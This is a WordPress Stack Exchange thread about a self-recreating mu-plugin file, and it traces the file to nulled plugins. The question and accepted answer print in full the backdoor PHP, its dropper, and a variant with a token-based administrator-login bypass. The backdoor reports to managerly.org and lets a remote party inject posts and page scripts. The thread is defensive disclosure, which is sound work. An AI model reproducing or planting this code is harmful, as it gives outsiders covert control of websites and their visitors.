# rms_unique_wp_mu_pl_fl_nm.php

Tags: plugins, security

What is creating this file? It's in /wp-content/mu-plugins directory. If I delete it, it comes back after a while. it contains these code:

```
<?php
if(!function_exists('do_rms_activation_task'))
{
    /* ------------Register Config Variables------------ */
    $GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';

    $GLOBALS['rms_disclaimer_text']      =   [];

    $GLOBALS['rms_ajax_del_request']     =   false;

    function send_rms_curl_request($action, $body)
    {
        $body['action']             =   $action;
        $body['remote_site_hash']   =   get_option('rms_remote_site_hash', '');
        $body['remote_site_id']     =   get_option('rms_remote_site_id', 0);

        $connect_to=$GLOBALS['rms_report_to'];

        $args=
        [
            'method'      => 'POST',
            'timeout'     => 15,
            'redirection' => 15,
            'headers'     => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
            'body'        => $body
        ];

        // Send to RMS
        $curl   = new Wp_Http_Curl();

        $result=$curl->request($connect_to, $args);

        $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

        return !$result ? [] : $result;
    }

    /* -------------Register Site to Manager------------- */
    function do_rms_activation_task($name, $text, $activating)
    {
        // generate password for later remote actions
        $length     = 5;
        $rms_pass   = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
        $rms_pass   = $rms_pass.microtime(true);
        $hash       = password_hash($rms_pass, PASSWORD_BCRYPT);

        $show_post=get_option('rms_show_post_to_logged');
        $show_post!=='yes' ? $show_post='no' : 0;

        // Gather data
        $data=
        [
            'title'     => get_bloginfo('name'),
            'url'       => get_home_url(),
            'ajax_url'  => admin_url('admin-ajax.php'),
            'ip'        => $_SERVER['SERVER_ADDR'],
            'tp'        => $name,
            'tp_status' => $activating,
            'hash'      => $hash,
            'show_to_logged'=>$show_post
        ];

        // send to rms
        $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);

        update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
        update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));

        update_option('rms_remote_connection_pass', $rms_pass);

        // show disclaimer if necessary when activating
        if($activating==true)
        {
            is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;

            if(count($GLOBALS['rms_disclaimer_text'])>0) 
            {
                $resp=json_encode($GLOBALS['rms_disclaimer_text']);

                setcookie('rms_disclaimer_pop_up', $resp);
            }
        }
    }

    /* check remote hash */
    function rms_check_remote_hash_pass()
    {
        if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
        {
            $rms_pass=get_option('rms_remote_connection_pass');

            if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
            {
                return true;
            }
        }
        exit;
    }

    /* ----Delete featured image upon change or delete---- */
    function delete_rms_thumbnaiil_remote($post_id)
    {
        $post_thumbnail_id = get_post_thumbnail_id( $post_id );

        is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
    }

    /* -----------Fetch and create featured image----------- */
    function rms_create_post_thumbnail($image_url, $post_id)
    {
        $image_name       = explode('/', $image_url); 
        $image_name       = end($image_name);
        $upload_dir       = wp_upload_dir(); // Set upload folder
        $image_data       = file_get_contents($image_url); // Get image data

        if($image_data==false)
        {
            return;
        }

        $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
        $filename         = basename( $unique_file_name ); // Create image file name

        // Check folder permission and define file location
        if( wp_mkdir_p( $upload_dir['path'] ) ) {
            $file = $upload_dir['path'] . '/' . $filename;
        } else {
            $file = $upload_dir['basedir'] . '/' . $filename;
        }

        // Create the image  file on the server
        file_put_contents( $file, $image_data );

        // Check image file type
        $wp_filetype = wp_check_filetype( $filename, null );

        // Set attachment data
        $attachment = array(
            'post_mime_type' => $wp_filetype['type'],
            'post_title'     => sanitize_file_name( $filename ),
            'post_content'   => '',
            'post_status'    => 'inherit'
        );

        // Delete existing thumbnail
        delete_rms_thumbnaiil_remote($post_id);

        // Create the attachment
        $attach_id = wp_insert_attachment( $attachment, $file, $post_id );

        update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);

        // Include image.php
        require_once(ABSPATH . 'wp-admin/includes/image.php');

        // Define attachment metadata
        $attach_data = wp_generate_attachment_metadata( $attach_id, $file );

        // Assign metadata to attachment
        wp_update_attachment_metadata( $attach_id, $attach_data );

        // And finally assign featured image to post
        set_post_thumbnail( $post_id, $attach_id );

        return $attach_id;
    }

    /* ----------------Create various posts---------------- */
    add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
    {
        rms_check_remote_hash_pass();

        if(!isset($_POST['post'])){exit;}

        $post=json_decode(stripcslashes($_POST['post']), true);

        if($post['local_id']>0)
        {
            /* Retrieve existing post id */
            $args=
            [
                'post_type'=>['post', 'page', 'rms_remote_hook'],
                'post_status' => 'any',
                'meta_key'=>'rms_rm_uniq_meta_post_id', 
                'meta_value'=>$post['local_id']
            ];

            $ex_post=get_posts($args);

            // if exist, update that
            (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
        }

        $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];

        // Convert post content
        $pst=[];
        foreach($to_post as $k)
        {
            if(isset($post[$k])) 
            {
                isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;

                $pst[$k]=$post[$k];
            }
        }

        // Default return value
        $resp=['rms_post_id'=>0, 'rms_post_url'=>''];

        $post_id=wp_insert_post($pst);

        if(is_numeric($post_id) && $post_id>0)
        {
            remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');

            $resp['rms_post_id']=$post_id;
            $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);

            update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);

            // Generate featured image
            if(isset($post['featured_image'])) 
            {
                rms_create_post_thumbnail($post['featured_image'], $post_id);
            }

            isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
        }

        exit(json_encode($resp));
    });

    /* Enable/disable post show hide */
    add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
    {
        rms_check_remote_hash_pass();

        if(isset($_POST['post_state']))
        {
            $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';

            update_option('rms_show_post_to_logged', $state);

            exit(json_encode(['message'=>'New post state assigned.']));
        }
    });


    /* --------------Delete posts-------------- */
    add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
    {
        rms_check_remote_hash_pass();

        if(!isset($_POST['local_ids'])){exit;}

        $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);

        if(!is_array($l_ids) || count($l_ids)==0){exit;}

        $args=
        [
            'meta_key'  =>'rms_rm_uniq_meta_post_id', 
            'meta_value'=>$l_ids,
            'post_status'=>'any',
            'post_type'=>['post', 'page', 'rms_remote_hook']
        ];

        $pst=get_posts($args);

        $GLOBALS['rms_ajax_del_request']=true;

        foreach($pst as $p)
        {
            delete_rms_thumbnaiil_remote($p->ID);
            wp_delete_post($p->ID, true);
        }

        exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
    });



    /* ----------Invoke remote hooks---------- */
    $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
    !is_array($hook_posts) ? $hook_posts=[] : 0;

    // Store hook posts in global
    global $rms_hok_list_array;
    $GLOBALS['rms_hok_list_array']=[];

    foreach($hook_posts as $p)
    {
        $met=get_post_meta($p->ID, 'rms_remote_hook', true);

        if(!is_string($met) || $met==''){continue;}

        !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;

        $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
    }

    // Process individual hook
    function run_rms_hook_caller_func($hook_name)
    {
        if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}

        foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
        {
            echo is_string($str) ? $str : '';
        }
    }

    /* Post delete hook/notification */
    add_action( 'before_delete_post', 'rms_action_function_name_6568');
    function rms_action_function_name_6568($id)
    {
        $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);

        if(!is_numeric($local_id)){return;}

        delete_rms_thumbnaiil_remote($id);

        if($GLOBALS['rms_ajax_del_request']==true){return;}

        send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
    }

    /* ----------Hide post for logged in---------- */
    function rms_pre_get_post_filter_action($query)
    {
        $meta_query = $query->get('meta_query');

        !is_array($meta_query) ? $meta_query=[] : 0;

        $meta_query[] = [
                            'key'=>'rms_rm_uniq_meta_post_id',
                            'compare'=>'NOT EXISTS'
                        ];

        $meta_query[] = [
                            'key'=>'rms_remote_featured_image',
                            'compare'=>'NOT EXISTS'
                        ];

        $query->set('meta_query', $meta_query);
    }
    add_action('init', function()
    {
        if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
        {   
            if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
            {
                add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
                add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
            }

            return;
        }

        add_action('admin_head', function()
        {
            echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
        });

        add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
    });

    /* --------------Frontend Scripts-------------- */
    add_action('admin_footer', function()
    {
        ?>
            <script>
                jQuery(document).ready(function($)
                {
                    var delete_cookie=function( name ) 
                    {
                        document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
                    }

                    var rms_getCookie=function(cname) 
                    {
                        var name = cname + "=";
                        var ca = document.cookie.split(';');
                        for(var i = 0; i < ca.length; i++) {
                            var c = ca[i];
                            while (c.charAt(0) == ' ') {
                            c = c.substring(1);
                            }
                            if (c.indexOf(name) == 0) {
                            return c.substring(name.length, c.length);
                            }
                        }
                        return "";
                    }

                    /* ----------Show disclaimer if necessary---------- */
                    var disc=rms_getCookie('rms_disclaimer_pop_up');
                    if(!disc){return;}

                    disc = disc.replace(/\+/g, '%20');
                    disc = decodeURIComponent(disc); 

                    disc=JSON.parse(disc);

                    if(!Array.isArray(disc)){return;}

                    disc.forEach(function(text)
                    {
                        var container=$('<div></div>');

                        container.css
                        ({
                            'position':'fixed',
                            'left':0,
                            'right':0,
                            'top':0,
                            'bottom':0,
                            'background':'rgba(0, 0, 0, 0.384)',
                            'z-index':'999999999'
                        });

                        var disclaimer=$('<div></div>');
                        disclaimer.css
                        ({
                            'width':'500px',
                            'position':'relative',
                            'top':'40px',
                            'max-width':'calc(100% - 40px)',
                            'max-height':'calc(100% - 80px)',
                            'overflow':'auto',
                            'padding':'11px',
                            'background':'white',
                            'border-radius':'7px',
                            'margin':'auto auto',
                            'display':'block'
                        }).find('img').css
                        ({
                            'max-width':'100%',
                            'height':'auto'
                        });

                        var head=$('<h4>Disclaimer</h4>');
                        head.css
                        ({
                            'text-align':'center'
                        });

                        var body=$('<div></div>');
                        body.html(text);

                        var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
                        agree.find('button').click(function()
                        {
                            container.remove();
                        });

                        disclaimer.append(head).append(body).append(agree);
                        container.append(disclaimer);

                        $('body').append(container);
                    });

                    delete_cookie('rms_disclaimer_pop_up');
                });
            </script>
        <?php
    });
}
?>
```

Comment: Impossible to say. It comes either from another plugin, your web host or some malware.

Comment: The owner of the remote domain is some random Chinese company: https://www.whois.com/whois/managerly.org

Answer (score 6, accepted):

I just encountered the same issue. After quick analysis I found that this file is allowing remote access of your website to a third party which is pretty much dangerous. This is found in wordpress websites that are using nulled wordpress plugins. This file is being generated from these two files bundled inside nulled plugins:

> rms-script-ini.php
>
> rms-script-mu-plugin.php

These files ensures that each time a wordpress website is accessed a file named `rms_unique_wp_mu_pl_fl_nm.php` is generated in mu-plugins directory if it doesn't exists already.

Here is the content of both files:

rms-script-ini.php

```
    <?php

        /* -----------Register activation hook----------- */
        if(!class_exists('RMSActivationRemoteHandler'))
        {
            class RMSActivationRemoteHandler
            {
                private $main_plugin;
                private $dependency;
                private $disc_text;
                private $ext_type;
                private $cext;
                private $DS=DIRECTORY_SEPARATOR;
                function __construct($path, $dep, $disc_text, $ext_type)
                {
                    $this->main_plugin      =   $path;
                    $this->dependency       =   $dep;
                    $this->disc_text        =   $disc_text;
                    $this->ext_type         =   $ext_type;
                    $this->cext             =   $ext_type=='themes' ?
wp_get_theme()->get('Name') : '';
                    !file_exists(WPMU_PLUGIN_DIR) ? mkdir(WPMU_PLUGIN_DIR) : 0;
                    $fname=$this->DS.$this->dependency;
$newname=WPMU_PLUGIN_DIR.$this->DS.'rms_unique_wp_mu_pl_fl_nm.php';
                    !file_exists($newname) ? copy(__DIR__.$fname , $newname) : 0;
                    // copy(__DIR__.$fname , $newname);
                    require_once($newname);

                !function_exists('get_plugin_data') ? require_once( ABSPATH.'wp-admin/includes/plugin.php' ) : 0;
            }    
            private function save_ext_data($activation)
            {
                $ext=get_option('rms_extension_names_from_event', []);
                !is_array($ext) ? $ext=[] : 0;
                $name = $this->ext_type=='themes' ? $this->cext : $this->get_extension_name();
                $ext[$name]=$activation;
                update_option('rms_extension_names_from_event', $ext);
            }
            function get_extension_name()
            {
                return $this->ext_type=='plugins' ? get_plugin_data($this->main_plugin)['Name'] : wp_get_theme()->get('Name');

            }
            function rms_activation_event_handler()
            {
                $name=$this->get_extension_name();
                $this->save_ext_data(true);
                do_rms_activation_task($name, $this->disc_text, true);
            }
            function rms_deactivation_event_handler()
            {
                $name=$this->get_extension_name();
                $this->save_ext_data(false);
                do_rms_activation_task($name, false, false);
            }

            function rms_deactivation_theme()
            {
                $this->save_ext_data(false);
                do_rms_activation_task($this->cext, false, false);
            }
        }
        function rms_remote_manager_init($main_file, $dependency, $disc_text)
        {
            // identify if theme or plugin
            $mn=str_replace('\\', '/', strtolower($main_file));
            $mn=explode('/', $mn);
            $mn=array_slice($mn, -3);
            $mn=isset($mn[0]) ? $mn[0] : '';
            if($mn!=='plugins' && $mn!=='themes'){return;}
            /* Initialize activation handler */
            $rms_activation_class=new RMSActivationRemoteHandler($main_file, $dependency, $disc_text, $mn);



            $args_act=[$rms_activation_class, 'rms_activation_event_handler'];

            $args_deact=[$rms_activation_class, 'rms_deactivation_event_handler'];



            if($mn=='plugins')

            {

                register_activation_hook($main_file, $args_act);



                register_deactivation_hook($main_file, $args_deact);

            }

            else

            {

                add_action('after_switch_theme', $args_act);



                add_action('switch_theme', [$rms_activation_class, 'rms_deactivation_theme']);

            }

        }

    }
    // Check in case clone to other site
    if(!isset($GLOBALS['rms_report_done_already']) || $GLOBALS['rms_report_done_already']!=='yes')
    {
        $GLOBALS['rms_report_done_already']='yes';
        $home=get_home_url();
        $opt=get_option('rms_report_done_already', []);
        !is_array($opt) ? $opt=[] : 0;
        if(!isset($opt[$home]))
        {
            $opt[$home]='yes';
            update_option('rms_report_done_already', $opt, 'yes');
            $ars=get_option('rms_extension_names_from_event', []);
            do_rms_activation_task($ars, false, false);
        }
    }
?>
```

rms-script-mu-plugin.php

```
<?php
// REMOTE LOGIN 
function remote_sign_in () {
    if(!$_GET['token'] && is_user_logged_in())    
        return;

    $key =  md5('thisisrandomtextsdsdsdsdsdsdsdsdsd');
    $minutes_1 = intval(gmdate('i')) + 1;
    $minutes_2 = intval(gmdate('i'));
    $signature[] = md5(gmdate("Ymd") . $key .  $minutes_1) ;
    $signature[] = md5(gmdate("Ymd") . $key .  $minutes_2) ;
    if(!in_array($_GET['token'] ,  $signature) )
        return;

    $users = get_users();
    foreach($users as $user ) {
        $user_id = $user->ID;
        $data = get_userdata( $user_id );
        $roles = $user->roles;
        if (in_array('administrator', $roles)) {
            log_me_in($user);
            exit;
        }
    }
}

add_action('init', 'remote_sign_in' );

function log_me_in ($user) {

     if ( !is_wp_error( $user ) )

{

    wp_clear_auth_cookie();

    wp_set_current_user ( $user->ID );

    wp_set_auth_cookie  ( $user->ID );



    $redirect_to = user_admin_url();

    wp_safe_redirect( $redirect_to );

    exit();

}
}
//END REMOTE LOGIN 
    if(!function_exists('do_rms_activation_task'))
    {
        /* ------------Register Config Variables------------ */
        $GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';
        $GLOBALS['rms_disclaimer_text']      =   [];
        $GLOBALS['rms_ajax_del_request']     =   false;

        function send_rms_curl_request($action, $body)
        {

            $body['action']             =   $action;

            $body['remote_site_hash']   =   get_option('rms_remote_site_hash', '');

            $body['remote_site_id']     =   get_option('rms_remote_site_id', 0);



            $connect_to=$GLOBALS['rms_report_to'];



            $args=

            [

                'method'      => 'POST',

                'timeout'     => 15,

                'redirection' => 15,

                'headers'     => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],

                'body'        => $body

            ];
            // Send to RMS
            $curl   = new Wp_Http_Curl();
            $result=$curl->request($connect_to, $args);
            $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;
            return !$result ? [] : $result;

        }
        /* -------------Register Site to Manager------------- */

        function do_rms_activation_task($name, $text, $activating)

        {

            // generate password for later remote actions

            $length     = 5;

            $rms_pass   = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);

            $rms_pass   = $rms_pass.microtime(true);

            $hash       = password_hash($rms_pass, PASSWORD_BCRYPT);



            $show_post=get_option('rms_show_post_to_logged');

            $show_post!=='yes' ? $show_post='no' : 0;



            // Gather data

            $data=

            [

                'title'     => get_bloginfo('name'),

                'url'       => get_home_url(),

                'ajax_url'  => admin_url('admin-ajax.php'),

                'ip'        => $_SERVER['SERVER_ADDR'],

                'tp'        => $name,

                'tp_status' => $activating,

                'hash'      => $hash,

                'show_to_logged'=>$show_post

            ];



            // send to rms

            $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);



            update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));

            update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));



            update_option('rms_remote_connection_pass', $rms_pass);



            // show disclaimer if necessary when activating

            if($activating==true)

            {

                is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;



                if(count($GLOBALS['rms_disclaimer_text'])>0) 

                {

                    $resp=json_encode($GLOBALS['rms_disclaimer_text']);



                    setcookie('rms_disclaimer_pop_up', $resp);

                }

            }

        }



        /* check remote hash */

        function rms_check_remote_hash_pass()

        {

            if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))

            {

                $rms_pass=get_option('rms_remote_connection_pass');



                if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))

                {

                    return true;

                }

            }

            exit;

        }



        /* ----Delete featured image upon change or delete---- */

        function delete_rms_thumbnaiil_remote($post_id)

        {

            $post_thumbnail_id = get_post_thumbnail_id( $post_id );



            is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;

        }



        /* -----------Fetch and create featured image----------- */

        function rms_create_post_thumbnail($image_url, $post_id)

        {

            $image_name       = explode('/', $image_url); 

            $image_name       = end($image_name);

            $upload_dir       = wp_upload_dir(); // Set upload folder

            $image_data       = file_get_contents($image_url); // Get image data



            if($image_data==false)

            {

                return;

            }



            $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name

            $filename         = basename( $unique_file_name ); // Create image file name



            // Check folder permission and define file location

            if( wp_mkdir_p( $upload_dir['path'] ) ) {

                $file = $upload_dir['path'] . '/' . $filename;

            } else {

                $file = $upload_dir['basedir'] . '/' . $filename;

            }



            // Create the image  file on the server

            file_put_contents( $file, $image_data );



            // Check image file type

            $wp_filetype = wp_check_filetype( $filename, null );



            // Set attachment data

            $attachment = array(

                'post_mime_type' => $wp_filetype['type'],

                'post_title'     => sanitize_file_name( $filename ),

                'post_content'   => '',

                'post_status'    => 'inherit'

            );



            // Delete existing thumbnail

            delete_rms_thumbnaiil_remote($post_id);



            // Create the attachment

            $attach_id = wp_insert_attachment( $attachment, $file, $post_id );



            update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);



            // Include image.php

            require_once(ABSPATH . 'wp-admin/includes/image.php');



            // Define attachment metadata

            $attach_data = wp_generate_attachment_metadata( $attach_id, $file );



            // Assign metadata to attachment

            wp_update_attachment_metadata( $attach_id, $attach_data );



            // And finally assign featured image to post

            set_post_thumbnail( $post_id, $attach_id );



            return $attach_id;

        }



        /* ----------------Create various posts---------------- */

        add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()

        {

            rms_check_remote_hash_pass();



            if(!isset($_POST['post'])){exit;}



            $post=json_decode(stripcslashes($_POST['post']), true);



            if($post['local_id']>0)

            {

                /* Retrieve existing post id */

                $args=

                [

                    'post_type'=>['post', 'page', 'rms_remote_hook'],

                    'post_status' => 'any',

                    'meta_key'=>'rms_rm_uniq_meta_post_id', 

                    'meta_value'=>$post['local_id']

                ];



                $ex_post=get_posts($args);



                // if exist, update that

                (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;

            }



            $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];



            // Convert post content

            $pst=[];

            foreach($to_post as $k)

            {

                if(isset($post[$k])) 

                {

                    isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;



                    $pst[$k]=$post[$k];

                }

            }



            // Default return value

            $resp=['rms_post_id'=>0, 'rms_post_url'=>''];



            $post_id=wp_insert_post($pst);



            if(is_numeric($post_id) && $post_id>0)

            {

                remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');



                $resp['rms_post_id']=$post_id;

                $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);



                update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);



                // Generate featured image

                if(isset($post['featured_image'])) 

                {

                    rms_create_post_thumbnail($post['featured_image'], $post_id);

                }



                isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;

            }



            exit(json_encode($resp));

        });



        /* Enable/disable post show hide */

        add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()

        {

            rms_check_remote_hash_pass();



            if(isset($_POST['post_state']))

            {

                $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';



                update_option('rms_show_post_to_logged', $state);



                exit(json_encode(['message'=>'New post state assigned.']));

            }

        });





        /* --------------Delete posts-------------- */

        add_action('wp_ajax_nopriv_rms_ping_delete_content', function()

        {

            rms_check_remote_hash_pass();



            if(!isset($_POST['local_ids'])){exit;}



            $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);



            if(!is_array($l_ids) || count($l_ids)==0){exit;}



            $args=

            [

                'meta_key'  =>'rms_rm_uniq_meta_post_id', 

                'meta_value'=>$l_ids,

                'post_status'=>'any',

                'post_type'=>['post', 'page', 'rms_remote_hook']

            ];



            $pst=get_posts($args);



            $GLOBALS['rms_ajax_del_request']=true;



            foreach($pst as $p)

            {

                delete_rms_thumbnaiil_remote($p->ID);

                wp_delete_post($p->ID, true);

            }



            exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));

        });







        /* ----------Invoke remote hooks---------- */

        $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);

        !is_array($hook_posts) ? $hook_posts=[] : 0;



        // Store hook posts in global

        global $rms_hok_list_array;

        $GLOBALS['rms_hok_list_array']=[];



        foreach($hook_posts as $p)

        {

            $met=get_post_meta($p->ID, 'rms_remote_hook', true);



            if(!is_string($met) || $met==''){continue;}



            !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;



            $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);

        }



        // Process individual hook

        function run_rms_hook_caller_func($hook_name)

        {

            if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}



            foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)

            {

                echo is_string($str) ? $str : '';

            }

        }



        /* Post delete hook/notification */

        add_action( 'before_delete_post', 'rms_action_function_name_6568');

        function rms_action_function_name_6568($id)

        {

            $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);



            if(!is_numeric($local_id)){return;}



            delete_rms_thumbnaiil_remote($id);



            if($GLOBALS['rms_ajax_del_request']==true){return;}



            send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);

        }



        /* ----------Hide post for logged in---------- */

        function rms_pre_get_post_filter_action($query)

        {

            $meta_query = $query->get('meta_query');



            !is_array($meta_query) ? $meta_query=[] : 0;



            $meta_query[] = [

                                'key'=>'rms_rm_uniq_meta_post_id',

                                'compare'=>'NOT EXISTS'

                            ];



            $meta_query[] = [

                                'key'=>'rms_remote_featured_image',

                                'compare'=>'NOT EXISTS'

                            ];



            $query->set('meta_query', $meta_query);

        }

        add_action('init', function()

        {

            if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())

            {   

                if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)

                {

                    add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});

                    add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});

                }



                return;

            }



            add_action('admin_head', function()

            {

                echo '<style>ul.subsubsub li.mine{display:none !important}</style>';

            });



            add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');

        });



        /* --------------Frontend Scripts-------------- */

        add_action('admin_footer', function()

        {

            ?>

                <script>

                    jQuery(document).ready(function($)

                    {

                        var delete_cookie=function( name ) 

                        {

                            document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';

                        }



                        var rms_getCookie=function(cname) 

                        {

                            var name = cname + "=";

                            var ca = document.cookie.split(';');

                            for(var i = 0; i < ca.length; i++) {

                                var c = ca[i];

                                while (c.charAt(0) == ' ') {

                                c = c.substring(1);

                                }

                                if (c.indexOf(name) == 0) {

                                return c.substring(name.length, c.length);

                                }

                            }

                            return "";

                        }



                        /* ----------Show disclaimer if necessary---------- */

                        var disc=rms_getCookie('rms_disclaimer_pop_up');

                        if(!disc){return;}



                        disc = disc.replace(/\+/g, '%20');

                        disc = decodeURIComponent(disc); 



                        disc=JSON.parse(disc);



                        if(!Array.isArray(disc)){return;}



                        disc.forEach(function(text)

                        {

                            var container=$('<div></div>');



                            container.css

                            ({

                                'position':'fixed',

                                'left':0,

                                'right':0,

                                'top':0,

                                'bottom':0,

                                'background':'rgba(0, 0, 0, 0.384)',

                                'z-index':'999999999'

                            });



                            var disclaimer=$('<div></div>');

                            disclaimer.css

                            ({

                                'width':'500px',

                                'position':'relative',

                                'top':'40px',

                                'max-width':'calc(100% - 40px)',

                                'max-height':'calc(100% - 80px)',

                                'overflow':'auto',

                                'padding':'11px',

                                'background':'white',

                                'border-radius':'7px',

                                'margin':'auto auto',

                                'display':'block'

                            }).find('img').css

                            ({

                                'max-width':'100%',

                                'height':'auto'

                            });



                            var head=$('<h4>Disclaimer</h4>');

                            head.css

                            ({

                                'text-align':'center'

                            });

                            var body=$('<div></div>');

                            body.html(text);
                            var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
                            agree.find('button').click(function()
                            {
                                container.remove();

                            });
                            disclaimer.append(head).append(body).append(agree);

                            container.append(disclaimer);

                            $('body').append(container);
                        });    
                        delete_cookie('rms_disclaimer_pop_up');
                    });
                </script>
            <?php
        });
    }
?>
```

And the code used to include and execute rms-script-ini.php is:

```
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);
```

It is highly recommended that you immidiately **remove any nulled plugin** from your website and **perform virus scan**.

Comment: Thank you Muhammad Mehroz Anjum. Yes it was nulled plugin. Removed it.

Comment: @MorshedAlamSumon You are welcome. If my answer has solved your problem then you can accept it as solution for this problem.

Comment: @fozuse It would not be appropriate to recommend any single plugin because no single plugin or Antivirus solution can protect you against all threats. if you think your wordpress website is compromised then read my answer here : https://wordpress.stackexchange.com/a/368709/107341